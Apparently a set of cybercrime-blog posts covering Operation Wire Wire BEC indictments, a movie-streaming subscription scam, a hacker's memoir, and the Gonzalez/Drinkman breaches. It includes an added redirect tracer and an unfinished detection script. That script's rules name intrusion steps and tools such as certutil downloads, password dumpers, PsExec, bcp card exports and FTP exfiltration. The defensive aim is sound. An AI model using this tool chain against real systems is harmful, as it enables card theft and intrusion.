In Operation Wire Wire: The South Florida Cases Part 2, we'll look at 18-CR-20170, with defendants Eliot Pereira, Natalie Armona, Bryant Ortega, Melissa Rios, Angelo Santa Cruz, Alexis Fernandez Cruz, Roberto Carlos Gracia, Jose E. Rivera, Angeles De Jesus Angulo, Jennifer Ruiz, Yirielkys Pacheco Fernandez, and Sebastian Loayza.

Monday, June 11, 2018

74 (Mostly Nigerians) Arrested in Business Email Compromise Action

Operation Wire Wire Cases 

Operation Wire Wire was announced June 11, 2018 by the Department of Justice.  This Operation led to the arrest of 42 people in the United States, 29 in Nigeria, and others in Poland, Canada, Mauritius, Indonesia, and Malaysia.  Not all of the case details have been made public yet, so this will be the first of several Operation Wire Wire blog posts.  What they all have in common is that they are all based on Business Email Compromise scams.


Case One: Okolie and Aisosa

Gloria Okolie ( 1:2018cr00029 ) - indicted in Georgia, arrested in Northern District of Texas on June 7, 2018.  She and Paul Aisosa, both Nigerian nationals residing in Dallas, are accused of laundering $665,000 in illicit funds.

Gloria opened a BBVA Compass Bank account in Addison, Texas in the name G.C. Investments and Logistics, with a $100 deposit.

Paul Wilson Aisosa opened an account at First National Bank of Texas in his own name at a branch in Killeen, Texas.  Someone using the email account 1234trot5@gmail.com sent emails to an attorney in Augusta, Georgia, who wired money from a sale of property to Okolie's BBVA Compass Bank account.  Some of these funds were wired to Paul's account from Gloria's account.

(A Facebook account in the name of Paul Aisosa checked into Dallas in April 2016)


Case Two: Odofuye, Nwoke, and Adejumo 

Adeyemi Odofuye (3:2016cr00232) (AKA Micky, AKA Micky Bricks, AKA Yemi, AKA GMB, AKA Bawz, AKA Jefe), is charged with a seven-count indictment in Connecticut for causing losses of $2.6 million, including $440,000 from a single victim in Connecticut.  (We'll call him Micky.)  According to his Facebook page, and the indictment, he recently graduated with a Masters of Science in Information Systems Security from Sheffield Hallam University.  One of Micky's email accounts was angelmicky_g41@yahoo.com.

He is indicted in Connecticut along with Stanley Hugochukwu Nwoke (AKA Stanley Banks, AKA Hugo Banks, AKA Banks, AKA Banky, AKA Jose Calderon), who was a student at ApTech Computer Education in Lagos, Nigeria.

The two used a variety of custom domains to conduct fraud against an Austrian company with offices in Connecticut, including: veteranboats.org, messidepot.com, secondtow.info.  With these emails, they requested wire transfers to Technix Trade SP and Weequahic Group Inc.  Some of the funds were transferred to an HSBC account in Hong Kong.

The third party in this case, Olumuyiwa Yahtrip Adejumo (AKA Slimwaco, AKA Waco Jamon, AKA Hade, AKA Hadey) resided at 506 Hampton Avenue in Toledo, Ohio.  (We'll call him Slimwaco.)  Slimwaco used his slimwaco@yahoo.com email address to communicate with praxes123@gmail.com both by email and Google chat.  He also sent numerous fraudulent emails to a company in Connecticut posing as the CEO of that company, causing five wire transfers totalling more than $500,000 to be sent "by his authorization".  Other email accounts he controlled included kkssus@gmail.com, waco4real82@yahoo.com, and slimhade@yahoo.com.  According to his Facebook page (in the name Adeola Crown Adejumo), he was originally from Ibadan, Nigeria.

The New Haven-based FBI agent who wrote the criminal complaint describes in detail the types of communications between the accounts: Slimwaco sent a list of the CFOs of 100 Ohio-based companies to one of his colleagues, and another list of more than 100 Illinois-based CFOs.  In another exchange, Micky and Slimwaco chat and help each other build lists of officers from public webpages and corporate directories.

Odofuye (Micky) was extradited from the UK.  Nwoke was extradited from Mauritius, the first extradition from there in 15 years!

Case 3:  Idris, Shitu, Nyamekye, Ibrahim, and Bolorunduro 

The Western District of Pennsylvania announced their own case as part of Operation Wire Wire, namely the arrest of Taiwo Musiliudeen Idris and four co-conspirators.  Idris was one of 29 scammers arrested in Nigeria as part of this operation.  Idris worked with Ismail Shitu, Nathanael Nyamekye, Adnan Ibrahim, and Akintayo Bolorunduro to launder over $411,000 in real estate settlements via BEC.  Their scam primarily targeted residential real estate sellers in Maryland. 

The indictment against these four, (Case 2:17-cr-00192-AJS) was filed October 5, 2017 in Pittsburgh and covers three distinct BEC Scams.

BEC Scam #1 - Rockville, Maryland.  A married couple who were selling a home were anticipating the receipt of a wire for $411,548.06 in proceeds.  However a fraudulent fax caused the funds to be redirected to an account at Citizens Bank in New York, controlled by Ismail Shitu, who resides in the Western District of Pennsylvania.

BEC Scam #2 - Hopkinton, Massachusetts.  A married couple waiting to receive $212,961.75 for the sale of a home had the same experience.  The attorney who was to handle the funds transfer received fraudulent correspondence directing him to send the funds to a Suntrust Bank account in Clinton, Maryland, also controlled by the criminals.

BEC Scam #3 - Charlotte, North Carolina.  A real estate developer sold four parcels of land for $235,058.53.  Once again, the lawyer handling the case received a fax, from the same number as the two cases above, (760) 297-5626, instructing him to send the money to a SunTrust Bank account in McDonough, Georgia.

These funds were then laundered through transfers, in amounts from $30,000 to $104,000, to various shell companies controlled by members of the conspiracy.   Companies such as "Remy Tire Mart", "Salem's Market and Grill", "Sea Gull Freight LLC", and "Stability Capital Group" all received transfers of the funds from BEC Scam #1.

Remy Tire Mart also received funds from BEC Scam #2.  BEC Scam #3 also sent funds to Miken Auto LLC, Labor of Love, and, oops, to Nathanael Nyamekye, who received $5,000 into an account in his true name.

Case 4: South Florida

We'll continue the Operation Wire Wire reporting as more cases are made public.  In South Florida, 23 individuals have been charged with laundering at least $10 Million from BEC scam proceeds, including 8 from a new indictment unsealed in Miami last week.   Reviewing the three related federal cases will be our next blog topic.

Monday, May 28, 2018

Affiliate Movie Streaming Scam Service

Dear readers,

I'm sharing some information here wondering if anyone can identify the criminal affiliate program at the root of this scam service.

The scam begins with what seems to be an automated bot-response posted on Facebook.  One of the outstanding questions -- can anyone identify a bot that is making these spammy posts?  These are a few examples from many thousands observed over the past week.

Step One: Unknown malware uses stolen Facebook credentials to post a spammy comment link.

We'll just do one walk through here, but each of these functions in the same way.  The spam post, which often will be added as a comment to a publicly shared post that mentions a movie, links to a Facebook page.  Let's walk through the Ogbani Wanyu post first.

Step Two: The Spam link points to a Facebook page created to share a shortened URL.

Facebook pages are created for recently popular movies that claim to offer the ability to watch the full movie and that share a shortened URL, usually a bit.ly link, though we've also seen goo.gl links.


Step Three: A shortened URL redirects to a Blogspot page (sometimes other types of pages)


The bit.ly shortened URL on the fake IMDB page has received 4,298 clicks as of this writing.  It is important to note that we've seen A COUPLE HUNDRED of these pages so far!  Each shortened URL points to a different redirection page.  So far about 80% of those we've traced go to Blogspot pages.

Step Four: A Blogspot page hosts a movie streaming service affiliate page

These Blogspot pages promise free streaming of many movies that are still in theaters.  Currently these include Solo (the new Star Wars movie), Avengers: Infinity War, Deadpool 2, Rampage, and many other movies that were only recently released in theaters.

Some of the top affiliates in this program actually point their bit.ly shortened URL at a free ".tk" domain, which then randomly sends the traffic to one of their dozens of Blogspot blogs.  That is the situation with Gmail user ugutganteng2345@gmail.com, who has at least 50 blogs associated with that Gmail account alone!  Each link takes the visitor to yet another movie streaming redirector site:



Step Five: Try to stream a Movie ... redirects to the streaming service and credits the affiliate

So, let's try to stream "Ant-Man and the Wasp" which, as of this writing, hasn't even been released to theaters yet.  


We are now redirected to the streaming service ... in this case, the site is "box.imdbmov.com" but that is one of dozens as well.  Note the "sub=doelsumbang" ... that part of the URL is revealing the affiliate name that should receive credit for the income generated from this click.

Many of the affiliate blogspot pages point to streaming services that have names similar to the old PutLocker criminal streaming service.
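Steps Two through Five above are a redirect chain, and the affiliate tag at the end of it is what is worth capturing at scale when hundreds of these short URLs are in play.  What follows is an added example, not code from the original post: a small tracer that follows HTTP 3xx Location headers and HTML meta-refresh hops, records every hop, and pulls the "sub=" parameter out of the final URL.  The fetch function is injectable, so the demo runs offline against a constructed chain.  The hostnames in that chain (other than bit.ly) are placeholders, not observed infrastructure; the affiliate value is reused from the URL shown above.  For live tracing, supply a fetcher that does not auto-follow redirects.

```python
"""Redirect-chain tracer for affiliate-link investigations.

Follow a starting link (e.g. a bit.ly short URL) through HTTP 3xx Location
headers and HTML <meta http-equiv="refresh"> hops, record every hop, and
extract the affiliate tag (the `sub=` query parameter seen on the streaming
site) from the final URL.  `fetch(url) -> (status, headers, body)` is
injected so the tracer can run offline against constructed responses."""
import re
from urllib.parse import urljoin, urlparse, parse_qs

# Matches <meta http-equiv="refresh" content="0; url=...">, case-insensitive.
META_REFRESH = re.compile(
    r'<meta[^>]+http-equiv\s*=\s*["\']?refresh["\']?[^>]*'
    r'content\s*=\s*["\']\s*\d+\s*;\s*url\s*=\s*([^"\'>\s]+)',
    re.IGNORECASE)

def next_hop(url, status, headers, body):
    """Return the next URL in the chain, or None if this page is terminal.
    Header names must already be lower-cased by the caller."""
    if 300 <= status < 400 and "location" in headers:
        return urljoin(url, headers["location"])
    m = META_REFRESH.search(body or "")
    if m:
        return urljoin(url, m.group(1))
    return None

def trace_chain(start, fetch, max_hops=10):
    """Follow redirects from `start`; return the ordered list of URLs visited.
    Stops on a terminal page, on a loop, or after max_hops, since redirector
    farms sometimes loop or chain deeply to wear out scanners."""
    chain, url = [start], start
    for _ in range(max_hops):
        status, headers, body = fetch(url)
        headers = {k.lower(): v for k, v in headers.items()}
        nxt = next_hop(url, status, headers, body)
        if nxt is None:
            break
        chain.append(nxt)
        if chain.count(nxt) > 1:   # loop detected: keep the evidence, stop
            break
        url = nxt
    return chain

def affiliate_tag(url, param="sub"):
    """Extract the affiliate identifier carried in a URL's query string."""
    return parse_qs(urlparse(url).query).get(param, [None])[0]

# Offline demo: a constructed redirect chain, not captured traffic.
FAKE_RESPONSES = {
    "https://bit.ly/2EXAMPLE":
        (301, {"Location": "http://free-movie-redirect.tk/go"}, ""),
    "http://free-movie-redirect.tk/go":
        (302, {"Location": "http://movie-affiliate-demo.blogspot.com/"}, ""),
    "http://movie-affiliate-demo.blogspot.com/":
        (200, {}, '<html><head><meta http-equiv="refresh" content="0; '
                  'url=http://box.streaming-demo.example/watch?id=1&sub=doelsumbang">'
                  '</head></html>'),
    "http://box.streaming-demo.example/watch?id=1&sub=doelsumbang":
        (200, {}, "<html>Register your free account</html>"),
}

def fake_fetch(url):
    """Stand-in for an HTTP client with redirect-following disabled."""
    return FAKE_RESPONSES.get(url, (404, {}, ""))

if __name__ == "__main__":
    chain = trace_chain("https://bit.ly/2EXAMPLE", fake_fetch)
    for i, u in enumerate(chain):
        print(f"hop {i}: {urlparse(u).netloc:36s} {u}")
    print("affiliate:", affiliate_tag(chain[-1]))
```

Run over a few hundred short URLs, the interesting output is the set of distinct affiliate tags and the redirector hosts each tag shares, which is what lets you group the blogs by operator rather than chasing them one at a time.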



Step Six: Register your "Free Account" 

Oops!  We can't watch the movie yet!  We haven't registered our "Free Account!" 



Stream your favorite movies FOR FREE!  Sign up FOR FREE!   FREE Unlimited Access!


Step Seven:  Provide your Credit Card for the Free Service!


Step Eight: Get Billed $39.95 per month

So, how much do you suppose this Free service will cost you?

That's right....$39.95 per month ... FOREVER.


But wait!  I thought it was FREE!?!?!? 

Did you read the Terms & Conditions?   Free trials are for 24 hours, after which, they automatically convert to premium accounts, billable at $39.95 per month.

Upon completion of the free trial period, your signup to the Site will renew automatically on a monthly basis billed as stipulated in your signup process, until cancelled regardless of the length of your free trial period. Please note, prices for the service may vary depending on country, device, service offered and promotions. The first day following the expiration of your free trial period will be your anniversary date for billing purposes during your Monthly Package Term. Your Payment Method will be charged the recurring monthly package fees and any applicable sales tax on the day following the expiration of your free trial period unless you have chosen to cancel your package prior to the conclusion of the free trial period. YOU MUST CANCEL YOUR MONTHLY PACKAGE PRIOR TO THE END OF THE FREE TRIAL OFFER TO AVOID CHARGES TO YOUR PAYMENT METHOD. You will not receive any notification from Silveris s.r.o. online at the expiration of your free trial. Please note the expiration date of your free trial for your records.

The Ask: Do you know more about this scam?

If you have additional information about any parts of this scam, we'd love to hear from you.  Examples of things we'd like to know:

1. Where does this program sign up affiliates?

2. What malware is making the Facebook spam comment posts?

3. Who runs the affiliate program?

Other gaming, movie, and book websites offering the same scammy terms of service:


Alpha-fun.net  Alphafuntime.com  AngeBliss.com  Angejoy.com Angel-bliss.net Animaflor.net Anima-fun.net  AnimaMuse.net  Aurora-star.net  Aurorawin.com  Blazeheaven.com Blissfulden.net  Bookrefuge.net  Cheerfun.net Cravebliss.com Cravemuse.com  Crescentfire.net Crescentflame.com  desert-star.net  Dusksky.net  Edenjoy.net Equi-fun.net Fairiefire.com Fairieglow.com  Fairydelight.net  FiestaBliss.net Filmpleasure.com Fireglows.net  Fire-stars.com  
Flame-paradise.com Flamestars.com Flametime.net  FuegoFun.com  FuegoFunlife.com Fuego-star.com  FuegoZone.com  FunFate.net  Funhamper.com  Funhoyden.com Funmuse.net  Funorbit.net  Funrange.net  Funsphere.net  Funvictory.net  Glitterbliss.net  Golden-orbs.com  gothic-night.net  HavenDay.com  Havenwin.com  HugeGames.net  Inksmedia.com JinxedFun.com  Joyorb.com Joysphere.com  Lemonyfun.com  LevityTime.net LuckBliss.com  MarvelBliss.com  Masters-media.net Medievalnight.net  Moonflame.net  Musenow.net Muse-park.net  Musestar.net  OasisPrima.com  OldiesMusicCity.net Orbbliss.com Orbfun.net  Orbjoy.com  Palmtreefun.net  Palmtreemedia.net  Pixiebuzz.com  Pixiefun.net PlayLatex.com Playchain.net Polkafun.net  Sherglee.com  Shinebliss.com  SilvberOrbs.net  Sparkhaven.com  Spring-box.net Star-muse.com  Takencheer.com  Takendelight.com Twilightfun.net Twinkle-fun.net  Vaultfun.net  Yaydigital.net Zen-Muse.net 

A Small Sampling of Blogs related to this scam:

http://anuapambuh001.blogspot.com/   
http://anyar456.blogspot.com/ 
http://asdfghjkfdgsdfaf.blogspot.com/ 
http://avengerinfiniitywar.blogspot.com/ 
http://avengers---boxoffice.blogspot.com/ 
http://avengers--infinity--war.blogspot.com/ 
http://avengersmarvell.blogspot.com/  
http://avenjerinfinitiwar2018.blogspot.com/ 
http://birudihatiku33.blogspot.com/ 
http://blackoval21.blogspot.com/ 
http://boxoffic---download.blogspot.com/ 
http://boxoffice----movie2018.blogspot.com/ 
http://boxoffice--acrimony--hd.blogspot.com/  
http://cap-halloween2018.blogspot.com/ 
http://ciaxs-movie.blogspot.com/  
http://cilokdicolookk505.blogspot.com/ 
http://cimenkabbook404.blogspot.com/  
http://deaaddpolll.blogspot.com/ 
http://deadpooll2freehd.blogspot.com/  
http://fastlifepainpayne.blogspot.com/  
http://filmimdb112.blogspot.com/ 
http://gghocher.blogspot.com/ 
http://gomovieonline90.blogspot.com/ 
http://goo212.blogspot.com/ 
http://happytoenjoythemovie.blogspot.com/  
http://home--boxoffice.blogspot.com/ 
http://jarwogembung.blogspot.com/  
http://kicebboong19.blogspot.com/ 
http://kolangkalingeduarew.blogspot.com/ 
http://kopisusuhitamkupu2.blogspot.com/ 
http://kurakurabuntung.blogspot.com/ 
http://liernjink.blogspot.com/ 
http://madea---lionsgate--boxoffice.blogspot.com/ 
http://madeamovielionsgate.blogspot.com/  
http://madeamoviie.blogspot.com/ 
http://mercyduffyunik.blogspot.com/
http://minininin21.blogspot.com/
http://moviekadutgood.blogspot.com/
http://moviesonlain212.blogspot.com/
http://moviestriming2018r.blogspot.com/
http://moviestriming222.blogspot.com/
http://nylenehnjk.blogspot.com/
http://oleholehemas.blogspot.com/
http://putlokeress12334.blogspot.com/
http://ratuangin79.blogspot.com/
http://rekuripure.blogspot.com/
http://septiselviana.blogspot.com/
http://tanduransubbur.blogspot.com/
http://tero-retewgold.blogspot.com/
http://terogew-oleb.blogspot.com/
http://the-golden-of-madea.blogspot.com/
http://the-venom-movie-online21.blogspot.com/
http://thebeastmovies2018.blogspot.com/
http://thefirstpurgehd.blogspot.com/
http://top-movie-newsmadea.blogspot.com/
http://trainemovies.blogspot.com/
http://transparanmovie.blogspot.com/
http://tyler--e--perry.blogspot.com/
http://tylerperry55.blogspot.com/
http://venom-movie-hd2018.blogspot.com/
http://welcome-tyler-perry21.blogspot.com/
http://wwwtyllerperry.blogspot.com/
http://zoss01.blogspot.com/
https://beastacrimony.blogspot.com/
https://camat-jos.blogspot.com/
https://inditinditanbae.blogspot.com/
https://luckgd69.blogspot.com/
https://madea-infamily.blogspot.com/
https://mocmov.blogspot.com/
https://reta-x.blogspot.com/
https://wakandawakandablackpanther.blogspot.com/

Sunday, May 13, 2018

How to Steal a Million: The Memoirs of a Russian Hacker

As a University researcher specializing in cybercrime, I've had the opportunity to watch the Russian carding market closely and write about it frequently on my blog "Cybercrime & Doing Time."  Sometimes this leads to interactions with the various criminals that I have written about, which was the case with Sergey.  I was surprised last January to be contacted and to learn that he had completed a ten year prison sentence and had written a book.   I have to say, I wasn't expecting much.  This was actually the third time a cybercriminal had tried to get my interest in a book they had written, and the first two were both horrible and self-promotional.  I agreed to read his first English draft, which he sent me in January 2017.

I was absolutely hooked from page 1.  As I have told dozens of friends since then, his story-telling vehicle is quite good.  The book starts with him already in prison, and in order to teach the reader about carding and cybercrime, a lawyer visits him periodically in prison, providing the perfect foil  needed to explain key concepts to the uninitiated, such as interrupting one of Sergey's stories to ask "Wait.  What is a white card?"
My copy of the book!

As someone who has studied cybercrime for more than 20 years, I was probably more excited than the average reader will be to see so many names and criminal forums and card shops that I recognized -- CarderPlanet, and card shop runners such as Vladislav Khorokhorin AKA BadB, Roman Vega AKA Boa, and data breach and hacking specialists like Albert Gonzalez and Vladimir Drinkman who served as the source of the cards that they were all selling.  These and many of the other characters in this book appeared regularly in this blog.  (A list is at the bottom of this article)

Whether these names are familiar to the reader or not, one can't help but be drawn into this story of intrigue, friendship, and deception as Pavlovich and his friends detect and respond to the various security techniques that shopkeepers, card issuers, and the law enforcement world are using to try to stop them.  Sergey shows how a criminal can rise quickly in the Russian cybercrime world by the face-to-face networking that a $100,000 per month income can provide, jet-setting the world with his fellow criminals and using business air travel, penthouse hotel suites, cocaine and women to loosen the lips of his peers so he can learn their secrets, but he also shows how quickly these business relationships can shatter in the face of law enforcement pressure.

The alternating chapters of the book serve as a stark reminder of where such life choices lead, as Sergey reveals the harsh realities of life in a Russian prison.  Even these are fascinating, as the smooth-talking criminal does his best to learn the social structure of Russian prison and find a safe place for himself on the inside.  The bone-crushing beatings, deprivation of food and privacy, and the fear of never knowing which inmate or prison guard will snap next in a way that could seriously harm or kill him is a constant reminder that eventually everyone gets caught and when they do, the consequences are extreme.

Sergey's original English manuscript has been greatly improved with the help of feedback from pre-readers and some great editors. After my original read, I told Sergey "I LOVE the story delivery mechanism, and there are fascinating stories here, but there are a few areas that really need some work."  It's clear that he took feedback like this seriously.  The new book, released in May 2018, is markedly improved without taking anything away from the brilliant story-telling of a fascinating criminal career ending with a harsh encounter with criminal justice.

A purchase link to get the book from Amazon: How to Steal a Million: The Memoirs of a Russian Hacker

The book was extremely revealing to me, helping me to understand just how closely linked the various Russian criminals are to each other, as well as revealing that some brilliant minds, trained in Computer Science and Engineering, and left morally adrift in a land where corruption is a way of life and with little chance of gainful employment, will apply those brilliant minds to stealing our money.

I seriously debated whether I should support this book.  Many so-called "reformed" criminals have reached out to me in the past, asking me to help them with a new career by meeting with them, recommending their services, or helping them find a job.  It is a moral dilemma.  Do I lend assistance to a man who stole millions of dollars from thousands of Americans?  Read the book.  To me, the value of this book is that it is the story of a criminal at the top of his game, betrayed by his colleagues and getting to face the reality of ten years in a Russian prison.  I think the book has value as a warning -- "a few months or even a couple years of the high life is not worth the price you will pay when it all comes crashing down."

Links to selected blog articles that feature Pavlovich's cast of characters:

May 12, 2008 TJX and Dave and Busters - Maksym Yastremskiy (Maksik), Aleksandr Suvorov (JonnyHell) and Albert Gonzalez (Segvec) and their role in the TJX Data Breach.

August 5, 2008 TJX Reminder: We Will Arrest You and We Will Send You To Jail - some of the legal aftermath of the case above.

August 8, 2008 TJX: the San Diego Indictments where the US government indicts:
  • SERGEY ALEXANDROVICH PAVLOVICH, aka Panther, aka Diplomaticos, aka PoL1Ce Dog, aka Fallen Angel, aka Panther757
  • DZMITRY VALERYEVICH BURAK, aka Leon, aka Graph, aka Wolf
  • SERGEY VALERYEVICH STORCHAK, aka Fidel
and charges them with violation of "18 USC Section 1029(b)(2) Conspiracy to Traffic Unauthorized Access Devices"

May 9, 2013 ATM Cashers in 26 Countries Steal $40M talks about BadB's role in "Unlimited" ATM cash-out schemes, and his arrest in 2010 and sentencing to 88 months in 2013.

Jan 14, 2014 Target Breach Considered in Light of Drinkman/Gonzalez Data Breach Gang talked about Albert Gonzalez, Vladimir Drinkman, and how there seemed to be such a strong pattern of behavior - a script if you will - to how criminals were conducting the major data breaches of that time.

Jan 27, 2014 Roman Vega (CarderPlanet's BOA) Finally Gets His Sentence addressed the plight of Roman Vega, who had been drifting around in the American criminal justice system, unsentenced, from 2003 until 2013! Dmitry Golubov AKA Script, the "godfather of CarderPlanet" is also discussed in this post.



Sunday, February 18, 2018

Drinkman and Smilianets Sentenced: The End to Our Longest Databreach Saga?

On Thursday, February 15, 2018, we may have finally reached the end of the Albert Gonzalez data breach saga.  Vladimir Drinkman, age 37, was sentenced to 144 months in prison after pleading guilty before U.S. District Judge Jerome Simandle in New Jersey.  His colleague, Dmitriy Smilianets, age 34, had also pleaded guilty and was sentenced to 51 months and 21 days in prison (which is basically "time served", so he'll walk immediately).  The pair were actually arrested in the Netherlands on June 28, 2012, and the guilty pleas came in September 2015 after they were extradited to New Jersey.

Those who follow data breaches will certainly be familiar with Albert Gonzalez, but may not realize how far back his criminal career goes.

On July 24, 2003, the NYPD arrested Gonzalez in front of a Chase Bank ATM at 2219 Broadway and found him in possession of 15 counterfeit Chase ATM cards and $3,000 in cash (see case 1:09-cr-00626-JBS).  After that arrest, Gonzalez was taken under the wing of a pair of Secret Service agents, David Esposito and Steve Ward.  Gonzalez describes some of the activities he engaged in during his time as a CI in the 53-page appeal that he filed March 24, 2011 from his prison cell in Milan, Michigan.

At one point, he claims that he explained to Agent Ward that he owed a Russian criminal $5,000 and couldn't afford to pay it.  According to his appeal, Ward told him to "Go do your thing, just don't get caught," and Agent Ward later asked him if he had "handled it."  Because of this, Gonzalez (who, according to his own sentencing memo, likely has Asperger's) claims he believed that he had permission to hack, as long as he didn't get caught.

Over Christmas 2007, Gonzalez and his crew hacked Heartland Payment Systems and stole around 130 million credit and debit cards.  He was also charged with hacking 7-Eleven (August 2007) and Hannaford Brothers (November 2007), where he stole 4.2 million credit and debit cards.  Two additional data breaches, against "Company A" and "Company B", were also listed.  Gonzalez's indictment refers to "HACKER 1 who resided in or near Russia" and "HACKER 2 who resided in or near Russia."  Another co-conspirator, "PT", was later identified as Patrick Toey, a resident of Virginia Beach, VA.  (Patrick Toey's sentencing memorandum is a fascinating document that describes his first "cash out trip" working for Albert Gonzalez in 2003.  Toey describes being a high school dropout who smoked marijuana and drank heavily, and who was "put on a bus to New York" by his mother to do the cash out run because she needed rent money.  Toey later moved in with Gonzalez in Miami, where he describes hacking Forever 21 "for Gonzalez" among other hacks.)

Gonzalez's extracurricular activities caught up with him when Maksym Yastremskiy (AKA Maksik) was arrested in Turkey.  Another point of Gonzalez's appeal was that Maksik was tortured by Turkish police, and that without that torture he never would have confessed, which would have meant that Gonzalez (then acting online as "Segvec") would never have been identified or arrested.  Gonzalez claims that he received an inadequate defense because his lawyer should have objected to the evidence "obtained under torture."  These charges against Gonzalez were tried in the Eastern District of New York (2:08-cr-00160-SJF-AKT) and proved that Gonzalez was part of the Dave & Buster's data breach.

On December 15, 2009, Gonzalez tried to shrug off some of his federal charges by filing a sentencing memo claiming that he lacked the "capacity to knowingly evaluate the wrongfulness of his actions", asserting that his criminal behavior "was consistent with description of the Asperger's disorder" and that he exhibited characteristics of "Internet addiction."  Two weeks later, after arguing that the court could not conduct its own psychological exam, Gonzalez signed a guilty plea under which the prosecutor would seek to limit his sentence to 17 years.  He is currently imprisoned in Yazoo, Mississippi (FBOP # 25702-050), scheduled to be released October 29, 2025.

Eventually "HACKER 1" and "HACKER 2" were indicted themselves in April 2012, with an arrest warrant issued in July 2012, but because other conspirators were still at large, the indictment was not unsealed until December 18, 2013.  HACKER 1 was Drinkman.  HACKER 2 was Alexandr Kalinin, who was indicted along with Drinkman and Smilianets.

Shortly after the Target Data Breach, I created a presentation called "Target Data Breach: Lessons Learned" which drew heavily on the history of Drinkman and Smilianets. Some of their documented data breaches included:
Victim                    Date                 Damages
NASDAQ                    May 2007             loss of control
7-ELEVEN                  August 2007
Carrefour                 October 2007         2 million cards
JCPenney                  October 2007
Hannaford                 November 2007        4.2 million cards
Wet Seal                  January 2008
Commidea                  November 2008        30 million cards
Dexia Bank Belgium        Feb '08 - Feb '09
Jet Blue                  Jan '08 - Feb '11
Dow Jones                 2009
EuroNet                   Jul '10 - Oct '11    2 million cards
Visa Jordan               Feb - Mar '11        800,000 cards
Global Payments Systems   Jan '11 - Mar '12
Diners Club Singapore     Jun '11
Ingenicard                Mar '12 - Dec '12

During the time of these attacks, Dmitriy Smilianets was also leading the video game world.  His team, The Moscow 5, were the "Intel Extreme Masters" champions in the first League of Legends championship, also placing in the Counter-Strike category.   Smilianets turned out not to be the hacker, but rather specialized in selling the credit cards that the other team members stole.  Steal a few hundred million credit cards and you can buy a nice gaming rig!

Smilianets with his World Champion League of Legends team in 2012

How did these data breaches work?

Lockheed Martin's famous paper "Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains" laid out the phases of an attack as an intrusion kill chain.  But my friend Daniel Clemens had explained these same phases to me years before, when he was teaching me the basics of penetration testing as he was first starting Packet Ninjas!

1. External Recon - Gonzalez and his crew scan for Internet-facing SQL servers.
2. Attack (Dan calls this "Establishing a Foothold") - using common SQL configuration weaknesses, they caused a set of additional tools to be downloaded from the Internet.
3. Internal Recon - these tools included a password dumper, password cracker, port scanner, and tools for bulk exporting data.
4. Expand (Dan calls this "Creating a Stronghold") - usually this consisted of monitoring the network until they found a Domain Admin userid and password.  (For example, in the Heartland Payment Systems attack, the VERITAS userid was found to have the password "BACKUP", which unlocked every server on the network!)
5. Dominate - Gonzalez's crew would then schedule an SQL script to dump their card data nightly.
6. Exfiltrate - the data was sent to remote servers via outbound FTP.

In Rolling Stone, Gonzalez claims he compromised more than 250 networks.
The Rolling Stone article, "Sex, Drugs, and the Biggest Cybercrime of All Time", also covers Steven Watt, who was charged in Massachusetts for providing attack tools to Gonzalez in October 2008.  Watt's tools were used in breaches including BJ's Wholesale Club, Boston Market, Barnes & Noble, Sports Authority, Forever 21, DSW, and OfficeMax.  As part of his sentencing, Watt was ordered to repay $171.5 million.

Almost all of those databreaches followed the same model ... scan, SQL Inject, download tools, plant a foothold, convert it to a stronghold by becoming a domain admin, dominate the network, and exfiltrate the data. 

How did the Target data breach happen, by the way?  Target is still listed as "Unsolved" ...   but let's review.  An SQL injection led to downloaded tools (including NetCat, PsExec, QuarksPWDump, ElcomSoft's Proactive Password Auditor, SomarSoft's DumpSec, Angry IP Scanner (for finding database servers), and Microsoft's OSQL and BCP (Bulk Copy)), a Domain Admin password was found (in Target's case, a BMC server monitoring tool running with the default password), the POS malware was installed, and data exfiltration began.

Sound familiar???
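The six phases above, together with the tool list from the Target walk-through, describe a chain that leaves process-creation telemetry at every step, which is what makes it detectable even when the individual tools are legitimate admin utilities.  What follows is an added example, not code from the original post: a small detection pass over Windows process-creation events that tags each event with the phase it belongs to and then flags hosts where several phases fired.  The event shape, the sample events, and the indicator strings (certutil as the downloader, bcp.exe with queryout as the bulk export, a scripted ftp.exe session as the exfiltration channel, a service account named after the Heartland anecdote) are constructed assumptions for this example; a real deployment would map the rules onto Sysmon or EDR telemetry and tune them.

```python
"""Toy detection pass for the intrusion pattern described above: an
Internet-facing SQL server as the foothold, tools dropped onto it,
credential dumping, lateral movement as a privileged account, a scheduled
bulk export of card data, and FTP exfiltration.  Input is a list of
process-creation events; the event shape and the sample data below are
constructed for this example, not real logs from any of the breaches."""
import re
from collections import defaultdict

# (phase, description, predicate).  Predicates see lower-cased basenames and
# command lines.  Indicator strings are illustrative; tune them to your estate.
RULES = [
    ("foothold", "SQL Server spawning a shell (xp_cmdshell-style)",
     lambda e: e["parent"] == "sqlservr.exe" and e["image"] in {"cmd.exe", "powershell.exe"}),
    ("tool drop", "command-line downloader",
     lambda e: e["image"] in {"certutil.exe", "bitsadmin.exe"}
               and ("urlcache" in e["cmd"] or "/transfer" in e["cmd"])),
    ("internal recon", "password dumper or port scanner",
     lambda e: any(t in e["image"] for t in ("pwdump", "quarks", "ipscan"))),
    ("stronghold", "remote execution with PsExec",
     lambda e: e["image"].startswith("psexec")),
    ("dominate", "bulk export of a card table, interactive or scheduled",
     lambda e: (e["image"] in {"bcp.exe", "osql.exe", "sqlcmd.exe"} and "queryout" in e["cmd"])
               or (e["image"] == "schtasks.exe" and "/create" in e["cmd"] and "bcp" in e["cmd"])),
    ("exfiltration", "scripted FTP session",
     lambda e: e["image"] == "ftp.exe" and re.search(r"-s:\S+", e["cmd"]) is not None),
]

def normalise(raw):
    """Lower-case and strip directory paths so rules match on basenames."""
    base = lambda p: p.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return {"parent": base(raw["parent"]), "image": base(raw["image"]),
            "cmd": raw["cmd"].lower()}

def classify(raw):
    """Phases an event matches, as a list of (phase, description)."""
    e = normalise(raw)
    return [(phase, desc) for phase, desc, pred in RULES if pred(e)]

def detect(events):
    """Group hits per host: {host: [(ts, phase, description, cmd), ...]}."""
    hits = defaultdict(list)
    for raw in events:
        for phase, desc in classify(raw):
            hits[raw["host"]].append((raw["ts"], phase, desc, raw["cmd"]))
    return dict(hits)

def hosts_with_full_chain(events, min_phases=4):
    """Hosts where at least `min_phases` distinct phases fired.  Any single rule
    will false-positive on a busy DBA; several phases on one host will not."""
    out = [h for h, rows in detect(events).items()
           if len({phase for _, phase, _, _ in rows}) >= min_phases]
    return sorted(out)

def ev(ts, host, user, parent, image, cmd):
    return {"ts": ts, "host": host, "user": user, "parent": parent, "image": image, "cmd": cmd}

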